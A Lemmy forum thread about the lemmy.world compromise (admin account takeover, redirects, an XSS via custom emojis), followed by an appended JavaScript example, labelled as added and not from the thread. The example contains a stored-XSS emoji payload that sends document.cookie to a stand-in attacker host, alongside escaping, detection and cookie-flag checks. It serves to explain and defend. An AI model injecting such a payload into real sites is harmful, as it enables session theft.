Original Post:

https://lemmy.dbzer0.com/post/536477

Title:

PSA: Lemmy.world has been compromised!

Post:

FYI!!! In case you start getting re-directed to porn sites.

Maybe the admin got hacked?

Images:

First, some random video shows up, I’m not gonna watch it in case it’s NSFL content.

Second, the website tries to redirect me, but uBlock Origin blocked it

The Front Page

Side Bar got messed up.

Everything else seems fine, here is the signup page with the Lemmy Version visible.

Also notable comment from the Original Post:

Yea, I switched to this alt. It appears to be one of the assistant admins’ accounts. Seems like an old fashioned anon prank, to me, they’re mainly just trying to make stuff offensive and redirect people to lemonparty.

So, y’know, old school.

I don’t know if any data is actually in danger, but I doubt it. I don’t see why assistant admins would need access to it.

Edit: Someone else said an admin’s credentials were compromised:

One of the admin accounts appears to have been compromised. The owner/other admins appear to be aware now because that account had its admin access revoked and offending posts are being removed.

Definitely opens up a big question about the security of Lemmy instances that I am sure will be discussed over the next few days.

@[email protected] be careful with making admins. And secure your passwords, use 2fa, etc…

Edit 2: Now the entire front page is filled with posts regarding the lemmy.world hack. Interesting…

https://i.imgur.com/VvxiphP.jpg

Edit 3: Lol a post was made from the hacked account claiming the hack was fixed, but that account is still under the hacker’s control:

https://archive.is/hRytN

Edit 4: Lol this is actually funny:

https://archive.is/wbQ2f

“Site has been seized by Reddit for Copyright Infringement” Lmfao

Edit 5: Threads was put on an allowlist, lemmy.ml was put on a blocklist, and everything else is under “linked instances”. I wasn’t quick enough to get a screenshot or an archive link.

Edit 6: lemmy.blahaj.zone just got hacked too!

I urge all instance admins to temporarily defederate from lemmy.world and lemmy.blahaj.zone as a safety precaution.

  • db0 (mod)
    16 · 1 year ago

    The XSS was due to custom emojis. We had some, but the attacker needed a local account to perform the exploit and either they were discouraged by our application registration, or didn’t pass it as I didn’t see anything worrying here. We have removed the custom emojis now so hopefully we’re safe.

    • @3rdBlueWizard
      3 · 1 year ago

      Can you clarify? If my instance doesn’t have custom emojis, it’s safe?

    • Machinist3359
      8 · 1 year ago

      One of many nice aspects of the fediverse, it’s not a software monoculture that can be wiped out by a single exploit.

      • YMS
        3 · 1 year ago

        But on the downside, as long as it is a vulnerability that’s not instance-specific or could be federated, you’ll have to investigate not one network / database / server cluster / software stack / user group / etc., but possibly hundreds or thousands, operated by mostly amateurs with very different levels of knowledge, living in very different time zones, having different availability.

  • @[email protected]
    5 · 1 year ago

    I don’t know if any data is actually in danger, but I doubt it. I don’t see why assistant admins would need access to it.

    What data do admins of a Lemmy instance have access to? Email addresses and login IP?

    I believe the most recent Lemmy update changed it so content deleted by users is deleted after 30 days now instead of kept indefinitely.

    • burrp
      9 · 1 year ago

      Test User screenshot

      This is the view an admin has for a user via the existing Lemmy web UI. No email or IP is visible.

      The user’s data would only be available to someone with direct access to the database.

        • burrp
          3 · 1 year ago

          Correct, anyone who has shell access to the server(s) the instance is running on could query the database.

  • @[email protected]
    2 (edited) · 1 year ago

    well that really ruins my trust with lemmy.world… hope data isn’t in danger

    Edit: I now know this was a general security issue with the entirety of lemmy… not just lemmy.world, my bad.

      • @[email protected]
        6 · 1 year ago

        Data most definitely exists on the server. It has to be stored somewhere. Email is federated, too, but your inbox can certainly reach a limit of its allotted storage.

        • @[email protected]
          0 · 1 year ago

          What’s a database?

          Jokes aside, beehaw defederated from them for spam/aggression reasons then this. Ouch

          Granted their userbase exploded but it does seem interesting.

          • @[email protected]
            0 (edited) · 1 year ago

            Also not saying they are responsible. I’m just curious if they saw the calm before the storm.

            Edit: The app that I pay nothing for and have not contributed towards doesn’t allow comment editing and I had to resort to the web. Lol please play the tiniest violin for me as I struggle through these hard times. 🤣🤣🤣🤣

            • 001100 010010 (OP)
              3 · 1 year ago

              Lol I never even used an app, I’ve been using browser since June 12.

      • @[email protected]
        3 · 1 year ago

        from the official statement from lemmy.world: “Update While we believe the admins accounts were what they were after, it could be that other users accounts were compromised. Your cookie could have been ‘stolen’ and the hacker could have had access to your account, creating posts and comments under your name, and accessing/changing your settings (which shows your e-mail).”

        So yes, they very well could get my information, I don’t think you know how shit works.
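An added example, not code from this thread, from Lemmy or from lemmy.world, and not a reproduction of the actual bug: it models the two mechanisms the thread mentions, a custom-emoji renderer that interpolates admin-editable fields into HTML unescaped and so becomes a stored XSS sink (the class of issue db0 describes above), shown beside a hardened renderer, together with a cookie-exfiltration payload and a Set-Cookie flag check for the “stolen cookie” scenario in the lemmy.world statement quoted above. The field names, URLs, the payload and the cookie header are all constructed for illustration; the example assumes the emoji record is written by an account allowed to edit custom emojis, which matches db0’s point that the attacker needed a suitably privileged local account.

```javascript
// Added example, not Lemmy's code. Constructed custom-emoji record as an
// attacker holding an account that may edit custom emojis could save it.
// The alt text closes the quoted attribute and injects an onerror handler;
// src points at a host that will not resolve, so the handler fires.
const maliciousEmoji = {
  shortcode: "lol",
  imageUrl: "https://example.invalid/missing.png",
  altText: "lol\" onerror=\"fetch('https://attacker.invalid/c?'+encodeURIComponent(document.cookie))",
};

// Constructed benign record for comparison.
const benignEmoji = { shortcode: "wave", imageUrl: "https://example.invalid/wave.png", altText: "wave" };

// Vulnerable renderer: string interpolation with no escaping (hypothetical).
function renderEmojiUnsafe(emoji) {
  return `<img class="emoji" src="${emoji.imageUrl}" alt="${emoji.altText}" title=":${emoji.shortcode}:">`;
}

// Escape the characters that can end an attribute value or open a tag.
function escapeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Allow only http(s) image URLs; rejects javascript:, data: and unparsable input.
function safeImageUrl(value) {
  try {
    const url = new URL(String(value));
    if (url.protocol === "https:" || url.protocol === "http:") return url.href;
  } catch (_) {
    // not a parsable absolute URL: fall through and reject
  }
  return "";
}

// Hardened renderer: URL scheme allowlisted, every attribute value escaped.
function renderEmojiSafe(emoji) {
  const src = safeImageUrl(emoji.imageUrl);
  if (src === "") return ""; // drop an emoji with an unacceptable URL entirely
  return `<img class="emoji" src="${escapeAttr(src)}" alt="${escapeAttr(emoji.altText)}" title=":${escapeAttr(emoji.shortcode)}:">`;
}

// Review helper for stored markup: walks each tag, skips quoted attribute
// values, and reports an on*= attribute name, i.e. an injected handler.
function hasInlineEventHandler(html) {
  let i = 0;
  while (i < html.length) {
    if (html[i] !== "<") { i++; continue; }
    i++;
    while (i < html.length && html[i] !== ">") {
      const c = html[i];
      if (c === '"' || c === "'") {
        const close = html.indexOf(c, i + 1);
        i = close === -1 ? html.length : close + 1;
        continue;
      }
      if (/\s/.test(c) && /^\s+on[a-z]+\s*=/i.test(html.slice(i))) return true;
      i++;
    }
  }
  return false;
}

// Cookie-side check. HttpOnly keeps document.cookie from returning the
// session cookie, so the payload above exfiltrates nothing; Secure and
// SameSite narrow other theft paths. Caveat: script running in the page can
// still send authenticated requests with the browser's ambient cookie, so
// HttpOnly blunts exfiltration but does not stop an XSS acting as the user.
function sessionCookieFlags(setCookieHeader) {
  const attrs = String(setCookieHeader).split(";").slice(1).map((p) => p.trim().toLowerCase());
  const sameSite = attrs.find((a) => a.startsWith("samesite="));
  return {
    httpOnly: attrs.includes("httponly"),
    secure: attrs.includes("secure"),
    sameSite: sameSite ? sameSite.split("=")[1] : null,
  };
}

// Stand-alone demonstration (guarded so it also loads as a module).
if (typeof require !== "undefined" && require.main === module) {
  console.log(renderEmojiUnsafe(maliciousEmoji));
  console.log(renderEmojiSafe(maliciousEmoji));
  console.log(sessionCookieFlags("jwt=abc; Path=/; HttpOnly; Secure; SameSite=Strict"));
}
```

Run with `node` to see the unsafe markup carrying a live `onerror=` attribute and the hardened markup with the same input reduced to inert `&quot;`-escaped text. The two renderers differ only in escaping and URL allowlisting; removing the custom emojis altogether, as db0 did, is the operational equivalent of cutting the input off at the source while the code is being fixed.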

  • CALIGVLA
    -3 · 1 year ago

    You know, maybe beehaw had a point. Just saying.